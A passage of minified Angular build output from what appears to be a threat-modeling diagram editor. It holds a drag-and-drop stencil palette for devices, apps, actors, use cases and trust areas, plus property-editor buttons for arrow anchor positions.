be(e),Me(B().onDragEnd())}),m(169,"div",17),s(170,"Trust Area"),u()(),s(171,"\n      "),u(),s(172,"\n    "),u(),s(173,"\n  "),Mt()}if(2&t){const e=B();C(20),ri("border-color",e.StrokeColor),C(6),ri("border-color",e.StrokeColor),C(2),ri("border-color",e.StrokeColor),C(25),ri("border-color",e.StrokeColor),C(6),ri("border-color",e.StrokeColor),C(2),ri("border-color",e.StrokeColor),C(27),ri("stroke",e.StrokeColor),C(2),ri("stroke",e.StrokeColor),C(4),ri("fill",e.StrokeColor),C(29),ri("border-color",e.StrokeColor),C(24),ri("border-color",e.StrokeColor),C(22),ri("border-color",e.StrokeColor)}}function jlt(t,a){if(1&t){const e=Ye();m(0,"div",31),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDragContext(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),s(1,"\n          "),m(2,"div",16),s(3),u(),s(4,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetContextRefToolTip(e)),C(2),ri("border-color",i.theme.Primary),C(1),ke(e.name)}}function Qlt(t,a){if(1&t){const e=Ye();m(0,"div",31),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDragContext(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),s(1,"\n          "),m(2,"div",16),s(3),u(),s(4,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetContextRefToolTip(e)),C(2),ri("border-color",i.theme.Primary),C(1),ke(e.name)}}function $lt(t,a){if(1&t){const e=Ye();m(0,"div",31),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDragContext(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),s(1,"\n          "),fi(),m(2,"svg",8),s(3,"\n            "),it(4,"circle",23),s(5,"\n            "),it(6,"path",24),s(7,"\n            "),m(8,"text",10),s(9,"\n              "),m(10,"tspan",25),s(11),u(),s(12,"\n            "),u(),s(13,"\n          "),u(),s(14,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetContextRefToolTip(e)),C(4),ri("stroke",i.theme.Primary),C(2),ri("stroke",i.theme.Primary),C(4),ri("fill",i.StrokeColor),C(1),ke(e.name)}}function Klt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7,"\n          Device\n        "),u(),s(8,"\n        "),m(9,"mat-panel-description"),s(10,"\n          "),m(11,"mat-icon"),s(12,"check_box_outline_blank"),u(),s(13,"\n        "),u(),s(14,"\n      "),u(),s(15,"\n  \n      "),m(16,"div",3),s(17,"\n        "),ne(18,jlt,5,4,"div",28),s(19,"\n      "),u(),s(20,"\n    "),u(),s(21,"\n\n    "),m(22,"mat-expansion-panel",2),s(23,"\n      "),m(24,"mat-expansion-panel-header"),s(25,"\n        "),m(26,"mat-panel-title"),s(27,"\n          App\n        "),u(),s(28,"\n        "),m(29,"mat-panel-description"),s(30,"\n          "),m(31,"mat-icon"),s(32,"check_box_outline_blank"),u(),s(33,"\n        "),u(),s(34,"\n      "),u(),s(35,"\n  \n      "),m(36,"div",3),s(37,"\n        "),ne(38,Qlt,5,4,"div",28),s(39,"\n      "),u(),s(40,"\n    "),u(),s(41,"\n\n    "),m(42,"mat-expansion-panel",2),s(43,"\n      "),m(44,"mat-expansion-panel-header"),s(45,"\n        "),m(46,"mat-panel-title"),s(47,"\n          Actor\n        "),u(),s(48,"\n        "),m(49,"mat-panel-description"),s(50,"\n          "),m(51,"mat-icon"),s(52,"people"),u(),s(53,"\n        "),u(),s(54,"\n      "),u(),s(55,"\n  \n      "),m(56,"div",3),s(57,"\n        "),ne(58,$lt,15,8,"div",28),s(59,"\n      "),u(),s(60,"\n    "),u(),s(61,"\n\n    "),m(62,"mat-expansion-panel",2),s(63,"\n      "),m(64,"mat-expansion-panel-header"),s(65,"\n        "),m(66,"mat-panel-title"),s(67,"\n          Use Case\n        "),u(),s(68,"\n        "),m(69,"mat-panel-description"),s(70,"\n          "),m(71,"mat-icon"),s(72,"radio_button_unchecked"),u(),s(73,"\n        "),u(),s(74,"\n      "),u(),s(75,"\n  \n      "),m(76,"div",3),s(77,"\n        "),m(78,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Use Case"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(79,"\n          "),fi(),m(80,"svg",8),s(81,"\n            "),it(82,"ellipse",29),s(83,"\n            "),m(84,"text",10),s(85,"\n              "),m(86,"tspan",30),s(87,"Use Case"),u(),s(88,"\n            "),u(),s(89,"\n          "),u(),s(90,"\n        "),u(),s(91,"\n      "),u(),s(92,"\n    "),u(),s(93,"\n\n    "),ln(),m(94,"mat-expansion-panel",2),s(95,"\n      "),m(96,"mat-expansion-panel-header"),s(97,"\n        "),m(98,"mat-panel-title"),s(99,"\n          Trust Area\n        "),u(),s(100,"\n        "),m(101,"mat-panel-description"),s(102,"\n          "),m(103,"mat-icon"),s(104,"select_all"),u(),s(105,"\n        "),u(),s(106,"\n      "),u(),s(107,"\n\n      "),m(108,"div",3),s(109,"\n        "),m(110,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Trust Area"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),m(111,"div",17),s(112,"Trust Area"),u()(),s(113,"\n      "),u(),s(114,"\n    "),u(),s(115,"\n  "),Mt()}if(2&t){const e=B();C(18),V("ngForOf",e.DeviceStencils),C(20),V("ngForOf",e.AppStencils),C(20),V("ngForOf",e.InteractorStencils),C(24),ri("stroke",e.StrokeColor),C(4),ri("fill",e.StrokeColor),C(25),ri("border-color",e.StrokeColor)}}let Xlt=(()=>{class t{constructor(e,i,n){this.dataService=e,this.theme=i,this.translate=n,this.stencilBuffer={},this.StrokeColor="black",this.wrapBuffer={},this.initalizeStencils(),this.dataService.Project.DFDElementsChanged.subscribe(r=>{r.Type==Ja.Removed&&this.initalizeStencils()}),this.dataService.Project.DevicesChanged.subscribe(r=>{this.initalizeStencils()}),this.dataService.Project.MobileAppsChanged.subscribe(r=>{this.initalizeStencils()})}get ProcessStencils(){return this.stencilBuffer.P[this.NodeType]}get DataStoreStencils(){return this.stencilBuffer.DS[this.NodeType]}get ExternalEntityStencils(){return this.stencilBuffer.EE[this.NodeType]}get DataFlowStencils(){return this.stencilBuffer.DF[this.NodeType]}get TrustAreaStencils(){return this.stencilBuffer.TA[this.NodeType]}get PhysicalLinkStencils(){return this.stencilBuffer.PL[this.NodeType]}get InterfaceStencils(){return this.stencilBuffer.IF[this.NodeType]}get StencilTemplates(){return this.stencilBuffer.ST[this.NodeType]}get DeviceStencils(){return this.stencilBuffer.DEV[this.NodeType]}get AppStencils(){return this.stencilBuffer.APP[this.NodeType]}get InteractorStencils(){return this.stencilBuffer.ACT[this.NodeType]}get ComponentTypes(){let e=[];const i=this.selectedNode.data;return this.dataService.Config.GetMyComponentTypes(this.NodeType==aa.Software?zr.Software:zr.Process).filter(r=>!i.GetChildren().map(c=>c.Type).includes(r)).forEach(r=>e.push(r)),e}get NodeType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.dataType}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.initalizeStencils()}ngOnInit(){this.setColors(this.theme.IsDarkMode),this.theme.ThemeChanged.subscribe(e=>{this.setColors(e)})}initalizeStencils(){if([aa.Software,aa.Process].includes(this.NodeType))return;const e=(r,c,d,T,k)=>{if(this.stencilBuffer[r][c]=[],d.sort(),d.forEach(q=>{this.dataService.Config.GetStencilTypes().filter(Y=>Y.IsDefault&&Y.ElementTypeID==q).forEach(Y=>this.stencilBuffer[r][c].push({stencilID:Y.ID,name:Y.Name}))}),T&&T.forEach(q=>this.stencilBuffer[r][c].push(...this.addDFDElementReferences(q))),k){const q=this.dataService.Config.GetStencilTypes().find(Y=>Y.IsDefault&&Y.ElementTypeID==d[0]);k.forEach(Y=>this.stencilBuffer[r][c].push(...this.addContextElementReferences(Y).map(te=>({name:te.name,stencilID:q.ID}))))}d.forEach(q=>{this.dataService.Config.GetStencilTypes().filter(Y=>!Y.IsDefault&&Y.ElementTypeID==q).forEach(Y=>this.stencilBuffer[r][c].push({stencilID:Y.ID,name:Y.Name}))}),d.forEach(q=>{this.dataService.Config.GetStencilTypeTemplates().filter(te=>(c==aa.Hardware&&te.ListInHWDiagram||c==aa.Dataflow&&te.ListInUCDiagram)&&te.StencilTypes.length>0&&te.ListInElementTypeIDs.includes(q)).forEach(te=>this.stencilBuffer[r][c].push({templateID:te.ID,name:te.Name}))})};let i="P";this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhyProcessing]),e(i,aa.Dataflow,[Et.LogProcessing],null,[Aa.MobileApp]),i="DS",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhyDataStore]),e(i,aa.Dataflow,[Et.LogDataStore]),i="EE",this.stencilBuffer[i]={},e(i,aa.Dataflow,[Et.LogExternalEntity,Et.PhyExternalEntity],[Et.LogExternalEntity,Et.PhyExternalEntity]),i="DF",this.stencilBuffer[i]={},e(i,aa.Dataflow,[Et.DataFlow]),i="TA",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhyTrustArea]),e(i,aa.Dataflow,[Et.LogTrustArea,Et.PhyTrustArea],[Et.PhyTrustArea],[Aa.MobileApp]),i="PL",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhysicalLink]),e(i,aa.Dataflow,[Et.PhysicalLink],[Et.PhysicalLink]),i="IF",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.Interface]),this.stencilBuffer[i][aa.Dataflow]=[];const n=this.dataService.Config.GetStencilTypes().filter(r=>r.ElementTypeID==Et.Interface&&null!=r.TemplateDFD);this.dataService.Config.GetStencilTypeTemplates().filter(r=>r.ListInUCDiagram&&r.StencilTypes.length>0&&n.some(c=>c.TemplateDFD==r)).forEach(r=>this.stencilBuffer[i][aa.Dataflow].push({templateID:r.ID,name:r.Name})),i="ST",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.Hardware]=[],this.dataService.Config.GetStencilTypeTemplates().filter(r=>r.ListInHWDiagram&&r.StencilTypes.length>0).forEach(r=>this.stencilBuffer[i][aa.Hardware].push({templateID:r.ID,name:r.Name})),this.stencilBuffer[i][aa.Dataflow]=[],this.dataService.Config.GetStencilTypeTemplates().filter(r=>r.ListInUCDiagram&&r.StencilTypes.length>0).forEach(r=>this.stencilBuffer[i][aa.Dataflow].push({templateID:r.ID,name:r.Name})),i="DEV",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.UseCase]=this.addContextElementReferences(Aa.Device),i="APP",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.UseCase]=this.addContextElementReferences(Aa.MobileApp),i="ACT",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.UseCase]=this.addContextElementReferences(Aa.Interactor)}addContextElementReferences(e){let i=[];return this.dataService.Project.GetContextElements().filter(n=>{var r,c,d;return!(n instanceof As||n instanceof Hg)&&n.Type==e&&(null===(r=this.dataService.Project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)!=(null===(d=null===(c=this.selectedNode)||void 0===c?void 0:c.data)||void 0===d?void 0:d.ID)}).forEach(n=>{i.push({elementID:n.ID,elementType:e,name:n.Name})}),i}addDFDElementReferences(e){let i=[];return this.dataService.Project.GetDFDElements().filter(n=>{var r,c,d,T;return!(n instanceof td||n instanceof zm)&&(null===(r=n.GetProperty("Type"))||void 0===r?void 0:r.ElementTypeID)==e&&(null===(c=this.dataService.Project.FindDiagramOfElement(n.ID))||void 0===c?void 0:c.ID)!=(null===(T=null===(d=this.selectedNode)||void 0===d?void 0:d.data)||void 0===T?void 0:T.ID)}).forEach(n=>{i.push({elementID:n.ID,name:n.Name})}),i}onDrag(e,i){e.dataTransfer.setData("dragDropData",JSON.stringify({stencilRef:i}));var r=document.createElement("div");r.textContent=i.name;let c=null;i.stencilID?c=this.dataService.Config.GetStencilType(i.stencilID):i.elementID?c=this.dataService.Project.GetDFDElement(i.elementID).GetProperty("Type"):i.templateID&&r.classList.add("trust-area"),c&&(c.ElementTypeID==Et.LogProcessing||c.ElementTypeID==Et.PhyProcessing?(r.classList.add("process"),r.style.borderStyle="solid",r.style.borderRadius="10px"):c.ElementTypeID==Et.LogDataStore||c.ElementTypeID==Et.PhyDataStore?(r.style.borderTopStyle="solid",r.style.borderBottomStyle="solid"):c.ElementTypeID==Et.LogExternalEntity||c.ElementTypeID==Et.PhyExternalEntity?r.style.borderStyle="solid":c.ElementTypeID==Et.LogTrustArea||c.ElementTypeID==Et.PhyTrustArea?r.style.borderStyle="dashed":c.ElementTypeID==Et.PhysicalLink?r.classList.add("physical-link"):c.ElementTypeID==Et.Interface?r.classList.add("interface"):console.error("ElementTypeID not implemented",c.ElementTypeID)),r.style.width="140px",r.style.height="75px",this.theme.IsDarkMode&&(r.style.backgroundColor="#424242"),r.style.borderColor=this.theme.IsDarkMode?"white":"black",r.style.textAlign="center",this.dragDiv=document.createElement("div"),this.dragDiv.appendChild(r),this.dragDiv.style.position="absolute",this.dragDiv.style.top="0px",this.dragDiv.style.left="-145px",this.dragDiv.style.borderStyle="none",this.dragDiv.style.backgroundColor="#424242",document.querySelector("body").appendChild(this.dragDiv),e.dataTransfer.setDragImage(this.dragDiv,0,0)}onDragContext(e,i){e.dataTransfer.setData("dragDropData",JSON.stringify({contextRef:i}));let r="200px",c="200px",d="-205px";i.elementType==Aa.Device&&(r="250px",c="350px",d="-255px"),i.elementType==Aa.MobileApp?(r="250px",c="350px",d="-255px"):"Interactor"==i.name||i.elementType==Aa.Interactor?(r="40px",c="50px",d="-45px"):i.name.startsWith("Interface")?(r="25px",c="25px",d="-25px"):"Use Case"==i.name?(r="140px",c="50px",d="-145px"):"External Entity"==i.name?(r="140px",c="75px",d="-145px"):"Trust Area"==i.name&&(r="300px",c="300px",d="-305px");var T=document.createElement("div");T.textContent=i.name.replace(/[0-9]/g,""),T.style.borderStyle="solid",T.style.width=r,T.style.height=c,this.theme.IsDarkMode&&(T.style.backgroundColor="#424242"),T.style.borderColor=this.theme.IsDarkMode?"white":"black",T.style.textAlign="center",this.dragDiv=document.createElement("div"),this.dragDiv.appendChild(T),this.dragDiv.style.position="absolute",this.dragDiv.style.top="0px",this.dragDiv.style.left=d,this.dragDiv.style.borderStyle="none",this.dragDiv.style.backgroundColor="#424242",document.querySelector("body").appendChild(this.dragDiv),e.dataTransfer.setDragImage(this.dragDiv,0,0)}onDragComponent(e,i){e.dataTransfer.setData("dragDropData",JSON.stringify({componentTypeID:null==i?void 0:i.ID}));var r=document.createElement("div");r.textContent="Component",r.classList.add("process","element-base","element-large"),r.style.width="140px",r.style.height="75px",this.theme.IsDarkMode&&(r.style.backgroundColor="#424242"),r.style.borderColor=this.theme.IsDarkMode?"white":"black",r.style.borderStyle="solid",r.style.textAlign="center",r.style.borderRadius="10px",this.dragDiv=document.createElement("div"),this.dragDiv.appendChild(r),this.dragDiv.style.position="absolute",this.dragDiv.style.top="0px",this.dragDiv.style.left="-145px",this.dragDiv.style.borderStyle="none",this.dragDiv.style.backgroundColor="#424242",document.querySelector("body").appendChild(this.dragDiv),e.dataTransfer.setDragImage(this.dragDiv,0,0)}onDragEnd(){document.querySelector("body").removeChild(this.dragDiv)}GetStencilRefToolTip(e){let i=e.name.replace(/\n/g," ");return e.elementID?i+="\n\n"+this.translate.instant("pages.modeling.stencilpalette.blueColor"):e.templateID&&(i+="\n\n"+this.translate.instant("pages.modeling.stencilpalette.purpleColor")),i}GetContextRefToolTip(e){let i=e.name.replace(/\n/g," ");return e.elementID&&(i+="\n\n"+this.translate.instant("pages.modeling.stencilpalette.blueColor")),i}WrapSVGText(e,i){if(null==e)return[];if(this.wrapBuffer[e])return this.wrapBuffer[e][i];let n=e.replace(/\n/g," ").split(" ");for(let c=0;c<n.length;c++){const d=n[c].indexOf("-");d>0&&(n.splice(c+1,0,n[c].substring(d+1)),n[c]=n[c].substring(0,d+1))}for(let c=0;c<n.length-1;c++)n[c].length+n[c+1].length<10&&(n[c]+=" "+n[c+1],n.splice(c+1,1));this.wrapBuffer[e]=[];const r=n.length<=2?1:0;for(let c=0;c<n.length;c++)this.wrapBuffer[e][c+r]=n[c];return this.WrapSVGText(e,i)}setColors(e){this.StrokeColor=e?"white":"black"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Oa),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-stencil-palette"]],inputs:{selectedNode:"selectedNode"},decls:22,vars:10,consts:[["multi","","displayMode","flat",1,"stencil-headers-align"],[4,"ngIf"],["expanded","true"],[2,"display","flex","flex-wrap","wrap"],["draggable","true","class","draggable-element","matTooltipShowDelay","1000",3,"matTooltip","dragstart","dragend",4,"ngFor","ngForOf"],["expanded","true",4,"ngIf"],["draggable","true","matTooltipShowDelay","1000",1,"draggable-element",3,"matTooltip","dragstart","dragend"],[1,"process","element-base","element-small"],[1,"element-small"],["d","M 0 4 L 0 34 A 10 1 0 0 0 70 34 L 70 4 A 10 1 0 0 0 0 4 A 10 1 0 0 0 70 4",2,"stroke-width","3px","fill","none"],["text-anchor","middle","inline-size","60"],["y","12","x","35"],["y","22.5","x","35",3,"fill",4,"ngIf"],["y","33","x","35",3,"fill",4,"ngIf"],["y","22.5","x","35"],["y","33","x","35"],[1,"external-entity","element-base","element-small"],[1,"trust-area","element-base","element-small"],["d","M3,0 L60,0 L67,18.75 L60,37.5 L3,37.5 L10,18.75 L3,0",2,"stroke-width","3px","fill","none"],["d","M8,0 L67,0 L62,37.5 L3,37.5 L8,0",2,"stroke-width","3px","fill","none"],["draggable","true",1,"draggable-element",3,"dragstart","dragend"],["draggable","true","matTooltipShowDelay","1000","class","draggable-element",3,"matTooltip","dragstart","dragend",4,"ngFor","ngForOf"],[1,"device","element-base"],["cx","35","cy","6","r","4",2,"stroke-width","3px","fill","none"],["d","M30,25 L35,17 L40,25 M35,17 L35,10 M28,14 L42,14",2,"stroke-width","3px","fill","none"],["y","35","x","35"],["draggable","true",1,"draggable-element",2,"width","100px","height","52px",3,"dragstart","dragend"],[1,"external-entity","element-base","element-tiny",2,"margin-left","15px"],["matTooltipShowDelay","1000","draggable","true","class","draggable-element",3,"matTooltip","dragstart","dragend",4,"ngFor","ngForOf"],["cx","35","cy","18.5","rx","33","ry","17",2,"stroke-width","3px","fill","none"],["y","22","x","35"],["matTooltipShowDelay","1000","draggable","true",1,"draggable-element",3,"matTooltip","dragstart","dragend"]],template:function(e,i){1&e&&(m(0,"mat-accordion",0),s(1,"\n  "),ne(2,ylt,19,6,"ng-container",1),s(3,"\n  "),ne(4,blt,19,6,"ng-container",1),s(5,"\n  "),ne(6,Mlt,19,6,"ng-container",1),s(7,"\n  "),ne(8,vlt,19,6,"ng-container",1),s(9,"\n  "),ne(10,Alt,19,6,"ng-container",1),s(11,"\n  "),ne(12,Tlt,19,6,"ng-container",1),s(13,"\n\n  "),ne(14,Hlt,110,8,"ng-container",1),s(15,"\n  "),ne(16,qlt,26,1,"ng-container",1),s(17,"\n\n  "),ne(18,Glt,174,24,"ng-container",1),s(19,"\n\n  "),ne(20,Klt,116,9,"ng-container",1),s(21,"\n"),u()),2&e&&(C(2),V("ngIf","char-scope"==i.NodeType),C(2),V("ngIf","obj-impact"==i.NodeType),C(2),V("ngIf","use-case"==i.NodeType),C(2),V("ngIf","system-threats"==i.NodeType),C(2),V("ngIf","asset"==i.NodeType),C(2),V("ngIf","software"==i.NodeType||"process"==i.NodeType),C(2),V("ngIf","dataflow"==i.NodeType||"hardware"==i.NodeType),C(2),V("ngIf","software"==i.NodeType||"process"==i.NodeType),C(2),V("ngIf","context"==i.NodeType),C(2),V("ngIf","use-case"==i.NodeType))},dependencies:[Zi,Ri,oa,Pa,tl,Ec,Dc,el,Il,Xi],styles:['.stencil-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel-header[_ngcontent-%COMP%]{height:35px!important}.stencil-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%]{justify-content:right;flex-grow:1}.stencil-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]{background-color:transparent}.process[_ngcontent-%COMP%]{border-style:solid;border-radius:10px}.data-store[_ngcontent-%COMP%]{border-top-style:solid;border-bottom-style:solid}.external-entity[_ngcontent-%COMP%], .data-flow[_ngcontent-%COMP%]{border-style:solid}.trust-area[_ngcontent-%COMP%]{border-style:dashed}.physical-link[_ngcontent-%COMP%], .interface[_ngcontent-%COMP%]{border-style:solid}.device[_ngcontent-%COMP%]{border-left-style:solid;border-right-style:solid;border-bottom-style:solid;width:44px;height:25px;margin-bottom:10px;margin-left:10px;margin-right:10px;font-size:12px}.element-base[_ngcontent-%COMP%]{display:inline-block;text-align:center;overflow:hidden;text-overflow:ellipsis}.element-small[_ngcontent-%COMP%]{width:70px;height:37.5px;font-size:12px}.element-tiny[_ngcontent-%COMP%]{width:20px;height:20px;font-size:12px}.element-large[_ngcontent-%COMP%]{width:140px;height:75px}.draggable-element[_ngcontent-%COMP%]{margin:2px 2px -3px;cursor:pointer}.column[_ngcontent-%COMP%]{float:left;width:50%}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}  .mat-tooltip{white-space:pre-line!important}']}),t})(),KT=(()=>{class t{constructor(e){this.select=e,this.spacekeydown=new Tt,this.select._handleKeydown=i=>{if(" "==i.key){const n=this.select.panelOpen&&this.select.options.filter(r=>r.active)[0]||null;this.spacekeydown.emit(n?n.value:null)}else this.select.disabled||(this.select.panelOpen?this.select._handleOpenKeydown(i):this.select._handleClosedKeydown(i))}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Nr,2))},t.\u0275dir=Ot({type:t,selectors:[["","no-space",""]],outputs:{spacekeydown:"spacekeydown"}}),t})();function Ylt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetArrowPositionName(e)))}}function Jlt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,Ylt,3,4,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("disable",!e.Editable),V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetArrowPositions())}}function Zlt(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){return be(e),Me(B(3).AssignNumberToAsset())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"properties.AssignNumber")))}function edt(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",23),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.checked))}),u()}if(2&t){const e=B().$implicit;V("checked",B(2).GetValue(e))("disabled",!e.Editable)}}function tdt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,e))}}function idt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,tdt,3,4,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("disable",!e.Editable),V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetDeviceInterfaceNames())}}function adt(t,a){1&t&&(fi(),it(0,"circle",36)),2&t&&Rt("fill",B(4).GetIconColor())}function ndt(t,a){1&t&&(fi(),it(0,"circle",37)),2&t&&Rt("fill",B(4).GetIconColor())}function odt(t,a){1&t&&(fi(),it(0,"circle",38)),2&t&&Rt("fill",B(4).GetIconColor())}function rdt(t,a){1&t&&(fi(),it(0,"circle",39)),2&t&&Rt("fill",B(4).GetIconColor())}function sdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.NorthWest}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function cdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.NorthEast}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function ldt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.SouthWest}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function ddt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.SouthEast}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function mdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.NorthWest}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function udt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.NorthEast}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function hdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.SouthWest}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function fdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.SouthEast}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function pdt(t,a){if(1&t){const e=Ye();fi(),s(0,"\n            "),ln(),m(1,"div",40),s(2,"\n              "),m(3,"div",41),s(4,"\n                "),m(5,"table"),s(6,"\n                  "),m(7,"tr"),s(8,"\n                    "),m(9,"td"),s(10,"\n                      "),ne(11,sdt,11,2,"button",42),s(12,"\n                    "),u(),s(13,"\n                    "),m(14,"td",43),s(15,"\n                      "),m(16,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.North}))}),s(17,"\n                        "),fi(),m(18,"svg",45),s(19,"\n                          "),it(20,"circle",46),s(21,"\n                          "),it(22,"line",47),s(23,"\n                          "),it(24,"line",48),s(25,"\n                        "),u(),s(26,"\n                      "),u(),s(27,"\n                    "),u(),s(28,"\n                    "),ln(),m(29,"td"),s(30,"\n                      "),ne(31,cdt,11,2,"button",42),s(32,"\n                    "),u(),s(33,"\n                  "),u(),s(34,"\n                  "),m(35,"tr"),s(36,"\n                    "),m(37,"td"),s(38,"\n                      "),m(39,"button",44),he("click",function(){be(e);const n=B(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.West}))}),s(40,"\n                        